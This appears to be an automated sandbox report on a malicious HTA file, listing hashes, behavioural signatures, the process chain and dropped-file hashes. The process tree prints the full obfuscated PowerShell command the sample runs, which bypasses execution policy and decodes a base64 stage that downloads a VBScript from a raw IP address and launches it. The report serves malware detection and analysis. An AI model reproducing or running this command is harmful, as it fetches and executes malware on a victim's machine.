Analysis
-
max time kernel
93s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
03/08/2024, 07:22
Static task
static1
Behavioral task
behavioral1
Sample
ccb5ab36adb3049199871c8ea2ac7c09.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ccb5ab36adb3049199871c8ea2ac7c09.hta
Resource
win10v2004-20240802-en
General
-
Target
ccb5ab36adb3049199871c8ea2ac7c09.hta
-
Size
102KB
-
MD5
ccb5ab36adb3049199871c8ea2ac7c09
-
SHA1
3fa4c77531043b8abe2c644d72e91809a771fb09
-
SHA256
32b2a9014ff68b0458e22e4c5823ec5f9bfd22d098281d0e5c245260db55ac85
-
SHA512
d28a2b40efba758ac1eeb0555ae57db8eac57a7b6cf358ffc4bd4c802b1c7fadd4a8febd882d7b28eea1c6f301a5447905a150128df3d9a84382bc1e57bb4de0
-
SSDEEP
768:tZ6A3yXNA0AGAckW5GBm5JlIDJ4gKMB7s+QiXAZO:tmbuxn
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 10 4656 powershell.exe 12 1140 WScript.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 4656 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4656 powershell.exe 4656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4656 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1592 wrote to memory of 4640 1592 mshta.exe 86 PID 1592 wrote to memory of 4640 1592 mshta.exe 86 PID 1592 wrote to memory of 4640 1592 mshta.exe 86 PID 4640 wrote to memory of 4656 4640 cmd.exe 88 PID 4640 wrote to memory of 4656 4640 cmd.exe 88 PID 4640 wrote to memory of 4656 4640 cmd.exe 88 PID 4656 wrote to memory of 2652 4656 powershell.exe 89 PID 4656 wrote to memory of 2652 4656 powershell.exe 89 PID 4656 wrote to memory of 2652 4656 powershell.exe 89 PID 2652 wrote to memory of 908 2652 csc.exe 90 PID 2652 wrote to memory of 908 2652 csc.exe 90 PID 2652 wrote to memory of 908 2652 csc.exe 90 PID 4656 wrote to memory of 1140 4656 powershell.exe 91 PID 4656 wrote to memory of 1140 4656 powershell.exe 91 PID 4656 wrote to memory of 1140 4656 powershell.exe 91
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ccb5ab36adb3049199871c8ea2ac7c09.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoWERsheLl -ex BypASs -NoP -w 1 -c DEVIcECredeNTIALdEpLoYmenT ; IeX($(iEX('[SYStem.text.ENcODInG]'+[cHAR]58+[char]58+'utF8.GeTsTriNg([sYSTEM.cONvErT]'+[cHAR]58+[ChAr]58+'frOmBASE64StRing('+[CHAr]0X22+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVGaW5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZTk9iZ20sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNR1dyR1osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUYUthTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9hdWdPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVQYyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ5UWVxS0piZ0cgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xNDQvbW9ybmluZ2RhdGluZ2xvdmVyLnZicyIsIiRFTlY6QVBQREFUQVxtb3JuaW5nZGF0aW5nbG92ZXIudkJTIiwwLDApO1N0YXJULXNMRUVQKDMpO1N0QXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG1vcm5pbmdkYXRpbmdsb3Zlci52QlMi'+[cHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERsheLl -ex BypASs -NoP -w 1 -c DEVIcECredeNTIALdEpLoYmenT ; IeX($(iEX('[SYStem.text.ENcODInG]'+[cHAR]58+[char]58+'utF8.GeTsTriNg([sYSTEM.cONvErT]'+[cHAR]58+[ChAr]58+'frOmBASE64StRing('+[CHAr]0X22+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVGaW5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZTk9iZ20sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNR1dyR1osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUYUthTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9hdWdPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVQYyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ5UWVxS0piZ0cgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xNDQvbW9ybmluZ2RhdGluZ2xvdmVyLnZicyIsIiRFTlY6QVBQREFUQVxtb3JuaW5nZGF0aW5nbG92ZXIudkJTIiwwLDApO1N0YXJULXNMRUVQKDMpO1N0QXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG1vcm5pbmdkYXRpbmdsb3Zlci52QlMi'+[cHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aponbak3\aponbak3.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA151.tmp" "c:\Users\Admin\AppData\Local\Temp\aponbak3\CSCDC713C665DB24AF593A8FF612DDB79F6.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\morningdatinglover.vBS"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1140
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58966f4008b199103f8d2c014072ef6d9
SHA147314ecfb766a965cb5a77a64b32f2a349a3030a
SHA256ac53e2ec5362d709edd0d73c26d5db181702f9fd31b34cb97b653e105296c525
SHA512af15eda9162d03be1a5a6442a5d76db6cc4559ae817ec75dc54724450c2a7623dedfd4aea51da77064828689bc16905772db04a8151b9f3e185b657c0364449e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5f8e0513569ef5a7df4078da0adf0208a
SHA182199f50ca14700ab8a32aeaf3304cd1fed88230
SHA256ffa8f35cf341a4923f7b459b6544a88413c81b1bd8f948b35e3b4027b6e194f2
SHA5128b975d138adba38533e61870865907504e483fd5d29e4dfb5fe94586bb74f0051592862695d9d91591485be06ea81f5f3e9d603091c2d56d35e457d901d83250
-
Filesize
3KB
MD5c537d8f37c24825679c6b293b6c02866
SHA163f6aa29ece8d977d1aaf97957bb7d7e55ed0a45
SHA256339f417f442c3533c80ac1524f3de7486c17093a007a869cf84eb20689839787
SHA512c26f0edcf027451ed18412ab9a4b3f33d46b366951573d5ab77ee0be93aa0756f658bb22e697de16860d7b5f3e281f336a8d70c58a7b3f4a5517db56d893fe28
-
Filesize
652B
MD57beff5d6622d3e86ad811f623dc5a75f
SHA193ef577ba650f5d8322148e924a7d7cc9ed95e1b
SHA2565d362bc357cea7f0a9d3c19ed98680af45a0fe602bfe1f7efb22143bde17f128
SHA5123edc44af5394f6fe0136fd1c8d6028d74e4f6c324ac5ffa194522dede67dd8dd19b526b026e22096758409793f87471c30cd28b4f8a6c3f8a946b90225774793
-
Filesize
446B
MD512d127af5dabfddafaf0c1a2cce85c39
SHA16987b89b04d2bf668dad14772e44809ac43f1067
SHA2562a8cc776894c95f08e772d05e5d82c1befe3d6d0679d69383671c77d6a7dcfd2
SHA51229a33f3868e98feaf70d9485ec77995c855adc7b4d349e868f6dc7a06ec18e2ad78fc48b19cdd36e8c39752fc8691172382d18ba684f6ef1ed02b63af88bc048
-
Filesize
369B
MD50802caef1aad7d0fc725fd48c6268700
SHA120702ac10a9d4e5849b274ccf8cb37f891a818f8
SHA2569eed32476d5ba33c3bae4e618c4fbcaf10d492002843c33bb46aaf3c4b347eec
SHA51292a468acc3805af776ba2eaec58d3bade1dc8db6047ee5b1f20a465ec27c45c0a77d2c3f0f3fd22d3bddd3a7eeef5ad7a5515b117c023f14adfe6e52e6394e49